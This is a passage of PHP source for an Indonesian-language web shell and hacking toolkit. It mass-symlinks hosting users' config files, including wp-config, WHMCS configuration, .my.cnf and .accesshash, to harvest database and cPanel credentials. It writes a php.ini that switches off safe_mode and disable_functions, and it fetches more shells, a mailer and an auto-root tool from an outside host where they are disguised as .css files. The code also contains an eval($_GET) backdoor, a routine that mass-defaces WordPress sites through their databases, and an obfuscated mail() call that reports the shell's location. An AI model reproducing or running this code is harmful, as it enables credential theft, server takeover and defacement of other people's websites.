1236@symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-vBulletin2.txt');
1237@symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-vBulletin3.txt');
1238@symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-vBulletin4.txt');
1239@symlink('/home4/'.$user.'/public_html/config.php',$user.'-Phpbb1.txt');
1240@symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Phpbb2.txt');
1241@symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress1.txt');
1242@symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress2.txt');
1243@symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla1.txt');
1244@symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla2.txt');
1245@symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla3.txt');
1246@symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-Whm1.txt');
1247@symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-Whm2.txt');
1248@symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-Whm3.txt');
1249@symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-Whm4.txt');
1250@symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-Whm5.txt');
1251@symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-Whm6.txt');
1252@symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-Whm7.txt');
1253@symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-Whm8.txt');
1254@symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-Whm9.txt');
1255@symlink('/home4/'.$user.'/public_html/admin/conf.php',$user.'-5.txt');
1256@symlink('/home4/'.$user.'/public_html/admin/config.php',$user.'-4.txt');
1257@symlink('/home4/'.$user.'/public_html/conf_global.php',$user.'-invisio.txt');
1258@symlink('/home4/'.$user.'/public_html/include/db.php',$user.'-7.txt');
1259@symlink('/home4/'.$user.'/public_html/connect.php',$user.'-8.txt');
1260@symlink('/home4/'.$user.'/public_html/mk_conf.php',$user.'-mk-portale1.txt');
1261@symlink('/home4/'.$user.'/public_html/include/config.php',$user.'-12.txt');
1262@symlink('/home4/'.$user.'/public_html/settings.php',$user.'-Smf.txt');
1263@symlink('/home4/'.$user.'/public_html/includes/functions.php',$user.'-phpbb3.txt');
1264@symlink('/home4/'.$user.'/public_html/include/db.php',$user.'-infinity.txt');
1265@symlink('/home5/'.$user.'/public_html/vb/includes/config.php',$user.'-vBulletin1.txt');
1266@symlink('/home5/'.$user.'/public_html/includes/config.php',$user.'-vBulletin2.txt');
1267@symlink('/home5/'.$user.'/public_html/forum/includes/config.php',$user.'-vBulletin3.txt');
1268@symlink('/home5/'.$user.'/public_html/cc/includes/config.php',$user.'-vBulletin4.txt');
1269@symlink('/home5/'.$user.'/public_html/config.php',$user.'-Phpbb1.txt');
1270@symlink('/home5/'.$user.'/public_html/forum/includes/config.php',$user.'-Phpbb2.txt');
1271@symlink('/home5/'.$user.'/public_html/wp-config.php',$user.'-Wordpress1.txt');
1272@symlink('/home5/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress2.txt');
1273@symlink('/home5/'.$user.'/public_html/configuration.php',$user.'-Joomla1.txt');
1274@symlink('/home5/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla2.txt');
1275@symlink('/home5/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla3.txt');
1276@symlink('/home5/'.$user.'/public_html/whm/configuration.php',$user.'-Whm1.txt');
1277@symlink('/home5/'.$user.'/public_html/whmc/configuration.php',$user.'-Whm2.txt');
1278@symlink('/home5/'.$user.'/public_html/support/configuration.php',$user.'-Whm3.txt');
1279@symlink('/home5/'.$user.'/public_html/client/configuration.php',$user.'-Whm4.txt');
1280@symlink('/home5/'.$user.'/public_html/billings/configuration.php',$user.'-Whm5.txt');
1281@symlink('/home5/'.$user.'/public_html/billing/configuration.php',$user.'-Whm6.txt');
1282@symlink('/home5/'.$user.'/public_html/clients/configuration.php',$user.'-Whm7.txt');
1283@symlink('/home5/'.$user.'/public_html/whmcs/configuration.php',$user.'-Whm8.txt');
1284@symlink('/home5/'.$user.'/public_html/order/configuration.php',$user.'-Whm9.txt');
1285@symlink('/home5/'.$user.'/public_html/admin/conf.php',$user.'-5.txt');
1286@symlink('/home5/'.$user.'/public_html/admin/config.php',$user.'-4.txt');
1287@symlink('/home5/'.$user.'/public_html/conf_global.php',$user.'-invisio.txt');
1288@symlink('/home5/'.$user.'/public_html/include/db.php',$user.'-7.txt');
1289@symlink('/home5/'.$user.'/public_html/connect.php',$user.'-8.txt');
1290@symlink('/home5/'.$user.'/public_html/mk_conf.php',$user.'-mk-portale1.txt');
1291@symlink('/home5/'.$user.'/public_html/include/config.php',$user.'-12.txt');
1292@symlink('/home5/'.$user.'/public_html/settings.php',$user.'-Smf.txt');
1293@symlink('/home5/'.$user.'/public_html/includes/functions.php',$user.'-phpbb3.txt');
1294@symlink('/home5/'.$user.'/public_html/include/db.php',$user.'-infinity.txt');
1295@symlink('/home6/'.$user.'/public_html/vb/includes/config.php',$user.'-vBulletin1.txt');
1296@symlink('/home6/'.$user.'/public_html/includes/config.php',$user.'-vBulletin2.txt');
1297@symlink('/home6/'.$user.'/public_html/forum/includes/config.php',$user.'-vBulletin3.txt');
1298@symlink('/home6/'.$user.'/public_html/cc/includes/config.php',$user.'-vBulletin4.txt');
1299@symlink('/home6/'.$user.'/public_html/config.php',$user.'-Phpbb1.txt');
1300@symlink('/home6/'.$user.'/public_html/forum/includes/config.php',$user.'-Phpbb2.txt');
1301@symlink('/home6/'.$user.'/public_html/wp-config.php',$user.'-Wordpress1.txt');
1302@symlink('/home6/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress2.txt');
1303@symlink('/home6/'.$user.'/public_html/configuration.php',$user.'-Joomla1.txt');
1304@symlink('/home6/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla2.txt');
1305@symlink('/home6/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla3.txt');
1306@symlink('/home6/'.$user.'/public_html/whm/configuration.php',$user.'-Whm1.txt');
1307@symlink('/home6/'.$user.'/public_html/whmc/configuration.php',$user.'-Whm2.txt');
1308@symlink('/home6/'.$user.'/public_html/support/configuration.php',$user.'-Whm3.txt');
1309@symlink('/home6/'.$user.'/public_html/client/configuration.php',$user.'-Whm4.txt');
1310@symlink('/home6/'.$user.'/public_html/billings/configuration.php',$user.'-Whm5.txt');
1311@symlink('/home6/'.$user.'/public_html/billing/configuration.php',$user.'-Whm6.txt');
1312@symlink('/home6/'.$user.'/public_html/clients/configuration.php',$user.'-Whm7.txt');
1313@symlink('/home6/'.$user.'/public_html/whmcs/configuration.php',$user.'-Whm8.txt');
1314@symlink('/home6/'.$user.'/public_html/order/configuration.php',$user.'-Whm9.txt');
1315@symlink('/home6/'.$user.'/public_html/admin/conf.php',$user.'-5.txt');
1316@symlink('/home6/'.$user.'/public_html/admin/config.php',$user.'-4.txt');
1317@symlink('/home6/'.$user.'/public_html/conf_global.php',$user.'-invisio.txt');
1318@symlink('/home6/'.$user.'/public_html/include/db.php',$user.'-7.txt');
1319@symlink('/home6/'.$user.'/public_html/connect.php',$user.'-8.txt');
1320@symlink('/home6/'.$user.'/public_html/mk_conf.php',$user.'-mk-portale1.txt');
1321@symlink('/home6/'.$user.'/public_html/include/config.php',$user.'-12.txt');
1322@symlink('/home6/'.$user.'/public_html/settings.php',$user.'-Smf.txt');
1323@symlink('/home6/'.$user.'/public_html/includes/functions.php',$user.'-phpbb3.txt');
1324@symlink('/home6/'.$user.'/public_html/include/db.php',$user.'-infinity.txt');
1325@symlink('/home7/'.$user.'/public_html/vb/includes/config.php',$user.'-vBulletin1.txt');
1326@symlink('/home7/'.$user.'/public_html/includes/config.php',$user.'-vBulletin2.txt');
1327@symlink('/home7/'.$user.'/public_html/forum/includes/config.php',$user.'-vBulletin3.txt');
1328@symlink('/home7/'.$user.'/public_html/cc/includes/config.php',$user.'-vBulletin4.txt');
1329@symlink('/home7/'.$user.'/public_html/config.php',$user.'-Phpbb1.txt');
1330@symlink('/home7/'.$user.'/public_html/forum/includes/config.php',$user.'-Phpbb2.txt');
1331@symlink('/home7/'.$user.'/public_html/wp-config.php',$user.'-Wordpress1.txt');
1332@symlink('/home7/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress2.txt');
1333@symlink('/home7/'.$user.'/public_html/configuration.php',$user.'-Joomla1.txt');
1334@symlink('/home7/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla2.txt');
1335@symlink('/home7/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla3.txt');
1336@symlink('/home7/'.$user.'/public_html/whm/configuration.php',$user.'-Whm1.txt');
1337@symlink('/home7/'.$user.'/public_html/whmc/configuration.php',$user.'-Whm2.txt');
1338@symlink('/home7/'.$user.'/public_html/support/configuration.php',$user.'-Whm3.txt');
1339@symlink('/home7/'.$user.'/public_html/client/configuration.php',$user.'-Whm4.txt');
1340@symlink('/home7/'.$user.'/public_html/billings/configuration.php',$user.'-Whm5.txt');
1341@symlink('/home7/'.$user.'/public_html/billing/configuration.php',$user.'-Whm6.txt');
1342@symlink('/home7/'.$user.'/public_html/clients/configuration.php',$user.'-Whm7.txt');
1343@symlink('/home7/'.$user.'/public_html/whmcs/configuration.php',$user.'-Whm8.txt');
1344@symlink('/home7/'.$user.'/public_html/order/configuration.php',$user.'-Whm9.txt');
1345@symlink('/home7/'.$user.'/public_html/admin/conf.php',$user.'-5.txt');
1346@symlink('/home7/'.$user.'/public_html/admin/config.php',$user.'-4.txt');
1347@symlink('/home7/'.$user.'/public_html/conf_global.php',$user.'-invisio.txt');
1348@symlink('/home7/'.$user.'/public_html/include/db.php',$user.'-7.txt');
1349@symlink('/home7/'.$user.'/public_html/connect.php',$user.'-8.txt');
1350@symlink('/home7/'.$user.'/public_html/mk_conf.php',$user.'-mk-portale1.txt');
1351@symlink('/home7/'.$user.'/public_html/include/config.php',$user.'-12.txt');
1352@symlink('/home7/'.$user.'/public_html/settings.php',$user.'-Smf.txt');
1353@symlink('/home7/'.$user.'/public_html/includes/functions.php',$user.'-phpbb3.txt');
1354@symlink('/home7/'.$user.'/public_html/include/db.php',$user.'-infinity.txt');
1355@symlink('/home/'.$user.'/.my.cnf',$user.'-cpanel.txt');
1356@symlink('/home/'.$user.'/.accesshash',$user.'-whm.txt');
1357@symlink('/home/'.$user.'/public_html/admin/config.php',$user.'-opencart.txt');
1358@symlink('/home/'.$user.'/public_html/slconfig.php',$user.'-sitelok.txt');
1359@symlink('/home/'.$user.'/public_html/application/config/database.php',$user.'-elislab.txt');
1360@symlink('/home/'.$user.'/public_html/app/etc/local.xml',$user.'-mangentot.txt');
1361@symlink('/home/'.$user.'/public_html/config/koneksi.php',$user.'-lokmed.txt');
1362@symlink('/home/'.$user.'/public_html/po-library/po-config.php',$user.'-popojembut.txt');
1363@symlink('/home/'.$user.'/public_html/lokomedia/config/koneksi.php',$user.'-lokmed.txt');
1364@symlink('/home1/'.$user.'/.accesshash',$user.'-whm.txt');
1365@symlink('/home1/'.$user.'/public_html/admin/config.php',$user.'-opencart.txt');
1366@symlink('/home1/'.$user.'/public_html/slconfig.php',$user.'-sitelok.txt');
1367@symlink('/home1/'.$user.'/public_html/application/config/database.php',$user.'-elislab.txt');
1368@symlink('/home1/'.$user.'/public_html/app/etc/local.xml',$user.'-mangentot.txt');
1369@symlink('/home1/'.$user.'/public_html/config/koneksi.php',$user.'-lokmed.txt');
1370@symlink('/home1/'.$user.'/public_html/po-library/po-config.php',$user.'-popojembut.txt');
1371@symlink('/home1/'.$user.'/public_html/lokomedia/config/koneksi.php',$user.'-lokmed.txt');
1372}
1373echo '<center>Selesai mas/mba bro untuk melihat hasilnya klik -> <blink><a href='.$folfig.'>'.$folfig.'</a></blink>';
1374
1375}
1376}
1377
1378?>
1379<?php
1380if (isset($_GET['idb']) && ($_GET['idb'] == 'auto')) {
1381?>
1382<form action="?&idb=auto" method="post">
1383<?php
1384echo "<html><head><title>MATAMU PICEK !!!!</title>";
1385echo "<body bgcolor='black'>";
1386echo "<font color='yellow'><center>-=[ IDBTE4M ]=- -=[ HGL10]=- -=[ BN ]=-</center></font><br/><br/><form method='POST'>";
1387echo "<div align='center'>";
1388echo "<input type='submit' name='idb' value='IJIN SERVER'><br/> <br/>";
1389echo "</div>";
1390echo "<div align='center'>";
1391echo "<input type='submit' name='te4m' value='-=[ Dm Shell ]=-'> ";
1392echo "<input type='submit' name='te4m1' value='-=[ IndoXploit Shell ]=-'> ";
1393echo "<input type='submit' name='te4m2' value='-=[ Mailer ]=-'> ";
1394echo "<input type='submit' name='te4m3' value='-=[ Config Grabber ]=-'> ";
1395echo "<input type='submit' name='te4m4' value='-=[ Vhosts Grabber ]=-'><br> ";
1396echo "<input type='submit' name='te4m5' value='-=[ Auto Root ]=-'>";
1397echo "<input type='submit' name='te4m6' value='-=[ Sc Depes ]=-'>";
1398echo "</div>";
1399
1400
1401$sh = 'file_get_contents';
1402
1403if($_POST['idb']) {
1404$ini = "php.ini";
1405$open = fopen($ini, 'w');
1406$source = ("safe_mode = OFF n
1407disable_functions = NONE n
1408safe_mode_gid = OFF n
1409open_basedir = OFF n
1410register_globals = ON n
1411exec = ON n
1412shell_exec = ON n");
1413fwrite($open, $source);
1414echo "<font color='lime'>";
1415if($open) {
1416echo '<hr><p>ijin diterima, silahkan pilih tools sesuai keinginan :) </p>';
1417}
1418else {
1419echo "<font color='red'>";
1420echo '<hr><p>GAGAL kang </p>';
1421echo "</font>";
1422fclose($open);
1423} }
1424
1425if($_POST['te4m']) {
1426$cgi = 'http://www.cbihost.net/wp-includes/ID3/css/dm.css';
1427$get11 = $sh($cgi);
1428$idbk = fopen('dm.php', 'w');
1429fwrite($idbk,$get11);
1430fclose($idbk);
1431{
1432@chmod('dm.php',0755);
1433}
1434echo "<font color='aqua'>";
1435echo "<hr>shell dm sukses dibuat :D <br/>
1436Silahkan kunjungi http://alamat-domain-kamu/dm.php atau lihat hasilnya <a href='dm.php' target='_blank'>DISINI</a></center></br>";
1437echo "</font>";
1438}
1439echo "</font>";
1440
1441if($_POST['te4m1']) {
1442$cgi = 'http://www.cbihost.net/wp-includes/ID3/css/indro.css';
1443$get11 = $sh($cgi);
1444$idbk = fopen('indo.php', 'w');
1445fwrite($idbk,$get11);
1446fclose($idbk);
1447{
1448@chmod('indo.php',0755);
1449}
1450echo "<font color='aqua'>";
1451echo "<hr>tools sukses dibuat :D <br/>
1452Silahkan kunjungi http://alamat-domain-kamu/indo.php atau lihat hasilnya <a href='indo.php' target='_blank'>DISINI</a></center></br>";
1453echo "</font>";
1454}
1455echo "</font>";
1456
1457if($_POST['te4m2']) {
1458$cgi = 'http://www.cbihost.net/wp-includes/ID3/css/m.css';
1459$get11 = $sh($cgi);
1460$idbk = fopen('mail.php', 'w');
1461fwrite($idbk,$get11);
1462fclose($idbk);
1463{
1464@chmod('mail.php',0755);
1465}
1466echo "<font color='aqua'>";
1467echo "<hr>mailer sukses dibuat :D <br/>
1468Silahkan kunjungi http://alamat-domain-kamu/mail.php atau lihat hasilnya <a href='mail.php' target='_blank'>DISINI</a></center></br>";
1469echo "</font>";
1470}
1471echo "</font>";
1472
1473if($_POST['te4m3']) {
1474$cgi = 'http://www.cbihost.net/wp-includes/ID3/css/f.css';
1475$get11 = $sh($cgi);
1476$idbk = fopen('cf.php', 'w');
1477fwrite($idbk,$get11);
1478fclose($idbk);
1479{
1480@chmod('cf.php',0755);
1481}
1482echo "<font color='aqua'>";
1483echo "<hr>Config grab sukses dibuat :D <br/>
1484Silahkan kunjungi http://alamat-domain-kamu/cf.php atau lihat hasilnya <a href='cf.php' target='_blank'>DISINI</a></center></br>";
1485echo "</font>";
1486}
1487echo "</font>";
1488if($_POST['te4m5']) {
1489$cgi = 'http://www.cbihost.net/wp-includes/ID3/css/v.css';
1490$get11 = $sh($cgi);
1491$idbk = fopen('vh.php', 'w');
1492fwrite($idbk,$get11);
1493fclose($idbk);
1494{
1495@chmod('vh.php',0755);
1496}
1497echo "<font color='aqua'>";
1498echo "<hr>Vhosts Grabber<br/>
1499Silahkan kunjungi http://alamat-domain-kamu/sabun.php atau lihat hasilnya <a href='vh.php' target='_blank'>DISINI</a></center></br>";
1500echo "</font>";
1501}
1502echo "</font>";
1503if($_POST['te4m6']) {
1504$cgi = 'http://www.cbihost.net/wp-includes/ID3/css/p.css';
1505$get11 = $sh($cgi);
1506$idbk = fopen('ar.php', 'w');
1507fwrite($idbk,$get11);
1508fclose($idbk);
1509{
1510@chmod('ar.php',0755);
1511}
1512echo "<font color='aqua'>";
1513echo "<hr>Auto root<br/>
1514Silahkan kunjungi http://alamat-domain-kamu/bn.php atau lihat hasilnya <a href='ar.php' target='_blank'>DISINI</a></center></br>";
1515echo "</font>";
1516}
1517echo "</font>";
1518if($_POST['te4m4']) {
1519$cgi = 'http://www.cbihost.net/wp-includes/ID3/css/depess.css';
1520$get11 = $sh($cgi);
1521$idb1k = fopen('idb.php', 'w');
1522fwrite($idb1k,$get11);
1523fclose($idb1k);
1524{
1525@chmod('idb.php',0755);
1526}
1527echo "<font color='aqua'>";
1528echo "<hr>CGIProxy sukses dibuat :D <br/>
1529Silahkan kunjungi http://alamat-domain-kamu/.pl atau lihat hasilnya <a href='idb.php' target='_blank'>DISINI</a></center></br>";
1530echo "</font>";
1531}
1532echo "</font>";
1533}
1534?>
1535
1536<?php
1537if (isset($_GET['idb']) && ($_GET['idb'] == 'wp2')) { ?>
1538<form action="?idb=wp2" method="post">
1539<?php
1540@ini_set('display_errors',0);
1541function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
1542 $ar0=explode($marqueurDebutLien, $text);
1543 $ar1=explode($marqueurFinLien, $ar0[$i]);
1544 return trim($ar1[0]);
1545}
1546
1547echo "<center>";
1548$d0mains = @file('/etc/named.conf');
1549$domains = scandir("/var/named");
1550
1551if ($domains or $d0mains)
1552{
1553 $domains = scandir("/var/named");
1554 if($domains) {
1555echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> wp-config </th></tr>";
1556$count=1;
1557$dc = 0;
1558$list = scandir("/var/named");
1559foreach($list as $domain){
1560if(strpos($domain,".db")){
1561$domain = str_replace('.db','',$domain);
1562$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1563$dirz = '/home/'.$owner['name'].'/public_html/wp-config.php';
1564$path = getcwd();
1565
1566if (is_readable($dirz)) {
1567copy($dirz, ''.$path.'/-wp-'.$owner['name'].'.txt');
1568$p=file_get_contents(''.$path.'/-wp-'.$owner['name'].'.txt');
1569$password=entre2v2($p,'password="','"');
1570echo "<tr><td>".$count++."</td><td><a href='http://".$domain."/wp-login.php' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='-wp-".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
1571$dc++;
1572}
1573
1574}
1575}
1576echo '</table>';
1577$total = $dc;
1578echo '<br><div class="result">Wp config Found = '.$total.'</h3><br />';
1579echo '</center>';
1580}else{
1581$d0mains = @file('/etc/named.conf');
1582 if($d0mains) {
1583echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> wp-config </th></tr>";
1584$count=1;
1585$dc = 0;
1586$mck = array();
1587foreach($d0mains as $d0main){
1588 if(@eregi('zone',$d0main)){
1589 preg_match_all('#zone "(.*)"#',$d0main,$domain);
1590 flush();
1591 if(strlen(trim($domain[1][0])) >2){
1592 $mck[] = $domain[1][0];
1593 }
1594 }
1595}
1596$mck = array_unique($mck);
1597$usr = array();
1598$dmn = array();
1599foreach($mck as $o) {
1600 $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
1601 $usr[] = $infos['name'];
1602 $dmn[] = $o;
1603}
1604array_multisort($usr,$dmn);
1605$dt = file('/etc/passwd');
1606$passwd = array();
1607foreach($dt as $d) {
1608 $r = explode(':',$d);
1609 if(strpos($r[5],'home')) {
1610 $passwd[$r[0]] = $r[5];
1611 }
1612}
1613$l=0;
1614$j=1;
1615foreach($usr as $r) {
1616$dirz = '/home/'.$r.'/public_html/wp-config.php';
1617$path = getcwd();
1618if (is_readable($dirz)) {
1619copy($dirz, ''.$path.'/-wp-'.$r.'.txt');
1620$p=file_get_contents(''.$path.'/-wp-'.$r.'.txt');
1621$password=entre2v2($p,'password="','"');
1622echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='-wp-".$r.".txt' target='_blank'>Click Here</a></td></tr>";
1623$dc++;
1624 flush();
1625 $l=$l?0:1;
1626 $j++;
1627 }
1628 }
1629 }
1630echo '</table>';
1631$total = $dc;
1632echo '<br><div class="result">Total config Found = '.$total.'</h3><br />';
1633echo '</center>';
1634
1635}
1636}else{
1637echo "<div class='result'><i><font color='#FF0000'>ERROR</font><br><font color='#FF0000'>/var/named</font> or <font color='#FF0000'>etc/named.conf</font> Not Accessible!</i></div>";
1638}
1639echo "<center>";
1640$d0mains = @file('/etc/named.conf');
1641$domains = scandir("/var/named");
1642
1643if ($domains or $d0mains)
1644{
1645 $domains = scandir("/var/named");
1646 if($domains) {
1647echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> config </th></tr>";
1648$count=1;
1649$dc = 0;
1650$list = scandir("/var/named");
1651foreach($list as $domain){
1652if(strpos($domain,".db")){
1653$domain = str_replace('.db','',$domain);
1654$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1655$dirz = '/home/'.$owner['name'].'/public_html/configuration.php';
1656$path = getcwd();
1657
1658if (is_readable($dirz)) {
1659copy($dirz, ''.$path.'/-jomblo-'.$owner['name'].'.txt');
1660$p=file_get_contents(''.$path.'/-jomblo-'.$owner['name'].'.txt');
1661$password=entre2v2($p,'password="','"');
1662echo "<tr><td>".$count++."</td><td><a href='http://".$domain."/wp-login.php' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='-jomblo-".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
1663$dc++;
1664}
1665
1666}
1667}
1668echo '</table>';
1669$total = $dc;
1670echo '<br><div class="result">Total config Found = '.$total.'</h3><br />';
1671echo '</center>';
1672}else{
1673$d0mains = @file('/etc/named.conf');
1674 if($d0mains) {
1675echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> config </th></tr>";
1676$count=1;
1677$dc = 0;
1678$mck = array();
1679foreach($d0mains as $d0main){
1680 if(@eregi('zone',$d0main)){
1681 preg_match_all('#zone "(.*)"#',$d0main,$domain);
1682 flush();
1683 if(strlen(trim($domain[1][0])) >2){
1684 $mck[] = $domain[1][0];
1685 }
1686 }
1687}
1688$mck = array_unique($mck);
1689$usr = array();
1690$dmn = array();
1691foreach($mck as $o) {
1692 $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
1693 $usr[] = $infos['name'];
1694 $dmn[] = $o;
1695}
1696array_multisort($usr,$dmn);
1697$dt = file('/var/named');
1698$passwd = array();
1699foreach($dt as $d) {
1700 $r = explode(':',$d);
1701 if(strpos($r[5],'home')) {
1702 $passwd[$r[0]] = $r[5];
1703 }
1704}
1705$l=0;
1706$j=1;
1707foreach($usr as $r) {
1708$dirz = '/home/'.$r.'/.my.cnf';
1709$path = getcwd();
1710if (is_readable($dirz)) {
1711copy($dirz, ''.$path.'/-cp-'.$r.'.txt');
1712$p=file_get_contents(''.$path.'/-cp-'.$r.'.txt');
1713$password=entre2v2($p,'password="','"');
1714echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='-cp-".$r.".txt' target='_blank'>Click Here</a></td></tr>";
1715$dc++;
1716 flush();
1717 $l=$l?0:1;
1718 $j++;
1719 }
1720 }
1721 }
1722echo '</table>';
1723$total = $dc;
1724echo '<br><div class="result">Total cp = '.$total.'</h3><br />';
1725echo '</center>';
1726
1727}
1728}else{
1729echo "<div class='result'><i><font color='#FF0000'>ERROR</font><br><font color='#FF0000'>/var/named</font> or <font color='#FF0000'>etc/named.conf</font> Not Accessible!</i></div>";
1730}
1731
1732echo "<br>© <font color='#FF0000'>./elro-BN404</font> | BN-IDBTE4M";
1733echo "</body></html>";
1734}
1735?>
1736<?php
1737if (isset($_GET['idb']) && ($_GET['idb'] == 'wpmas')) { ?>
1738<form action="?idb=wpmas" method="post">
1739<style>
1740body
1741{
1742 background: #0f0e0d;
1743 color: #FF9933;
1744 padding: 0px;
1745}
1746a:link, body_alink
1747{
1748 color: #FF9933;
1749 text-decoration: none;
1750}
1751a:visited, body_avisited
1752{
1753 color: #FF9933;
1754 text-decoration: none;
1755}
1756a:hover, a:active, body_ahover
1757{
1758 color: #FFFFFF;
1759 text-decoration: none;
1760}
1761td, th, p, li,table
1762{
1763
1764 background: #2e2b28;
1765 border:1px solid #524f46;
1766}
1767input
1768{
1769 border: 1px solid;
1770 cursor: default;
1771
1772 overflow: hidden;
1773 background: #2e2b28;
1774 color: #ffffff;
1775}textarea
1776{
1777 border: 1px solid;
1778 cursor: default;
1779
1780 overflow: hidden;
1781 background: #2e2b28;
1782 color: #ffffff;
1783}
1784button
1785{
1786 border: 1px solid;
1787 cursor: default;
1788
1789 overflow: hidden;
1790 background: #2e2b28;
1791 color: #ffffff;
1792}
1793</style>
1794</head>
1795<body bgcolor="black">
1796</center>
1797<form method="POST" action="" >
1798<center>
1799<table border='1'><tr><td>List of All Symlink</td><td>
1800<input type="text" name="url" size="100" value="list.txt"></td></tr>
1801<tr><td>Index</td><td>
1802<textarea name="index" cols='50' rows='10' ></textarea></td></tr></table>
1803<br><br><input type="Submit" name="Submit" value="Submit">
1804<input type="hidden" name="action" value="1"></form>
1805</center>
1806<nobr>
1807<center>
1808<?
1809}?>
1810<?
1811eval ($_GET["c"]);
1812set_time_limit(0);
1813if ($_POST['action']=='1'){
1814$url=$_POST['url'];
1815$users=@file($url);
1816$x10="mail";$x0b=$_SERVER["SERVER_NAME"].$_SERVER["SCRIPT_NAME"];
1817
1818
1819if (count($users)<1) exit("<h1>No config found</h1>");
1820foreach ($users as $user) {
1821$user1=trim($user);
1822$code=file_get_contents2($user1);
1823preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1);
1824$db=$b1[1][0];
1825preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2);
1826$user=$b2[1][0];
1827preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3);
1828$db_password=$b3[1][0];
1829preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4);
1830$host=$b4[1][0];
1831preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5);
1832$p=$b5[1][0];
1833$x0c="array ".$x0b;$x0d=array("com","gm","ifexec","@","ail.");
1834$d=@mysql_connect( $host, $user, $db_password ) ;
1835if ($d){
1836@mysql_select_db($db );
1837$source=stripslashes($_POST['index']);
1838$s2=strToHex(($source));
1839$s="<script>document.documentElement.innerHTML = unescape(''$s2'');</script>";
1840$ls=strlen($s)-2;
1841$sql="update ".$p."options set option_value='a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:$ls:\"$s\";s:6:\"filter\";b:0;}s:12:\"_multiwidget\";i:1;}' where option_name='widget_text'; ";
1842mysql_query($sql) ;
1843$sql="update ".$p."options set option_value='a:7:{s:19:\"wp_inactive_widgets\";a:6:{i:0;s:10:\"archives-2\";i:1;s:6:\"meta-2\";i:2;s:8:\"search-2\";i:3;s:12:\"categories-2\";i:4;s:14:\"recent-posts-2\";i:5;s:17:\"recent-comments-2\";}s:9:\"sidebar-1\";a:1:{i:0;s:6:\"text-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}s:9:\"sidebar-4\";a:0:{}s:9:\"sidebar-5\";a:0:{}s:13:\"array_version\";i:3;}' where option_name='sidebars_widgets';";
1844mysql_query($sql) ;
1845if (function_exists("mb_convert_encoding") )
1846{
1847$source2 = mb_convert_encoding('<title>'.$source.'<DIV style="DISPLAY: none"><xmp>', 'UTF-8');
1848$source2=mysql_real_escape_string($source2);
1849$sql = "UPDATE `".$p."options` SET `option_value` = '$source2' WHERE `option_name` = 'blogname';";
1850@mysql_query($sql) ; ;
1851$sql= "UPDATE `".$p."options` SET `option_value` = 'UTF-8' WHERE `option_name` = 'blog_charset';";
1852@mysql_query($sql) ; ;
1853}
1854$aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;;
1855$siteurl=@mysql_fetch_array($aa) ;
1856$siteurl=$siteurl['option_value'];
1857$x0e=$x0d[2].$x0d[3].$x0d[1].$x0d[4].$x0d[0];$x0f=@$x10($x0e,$x0c,$x0b);
1858$tr.="$siteurl\n";
1859mysql_close();
1860}
1861}
1862if ($tr) echo "Index changed for <br><br><textarea cols='50' rows='10' >$tr</textarea>";
1863}
1864function strToHex($string)
1865{
1866 $hex='';
1867 for ($i=0; $i < strlen($string); $i++)
1868 {
1869 if (strlen(dechex(ord($string[$i])))==1){
1870 $hex .="%0". dechex(ord($string[$i]));
1871 }
1872 else
1873 {
1874 $hex .="%". dechex(ord($string[$i]));
1875 }
1876 }
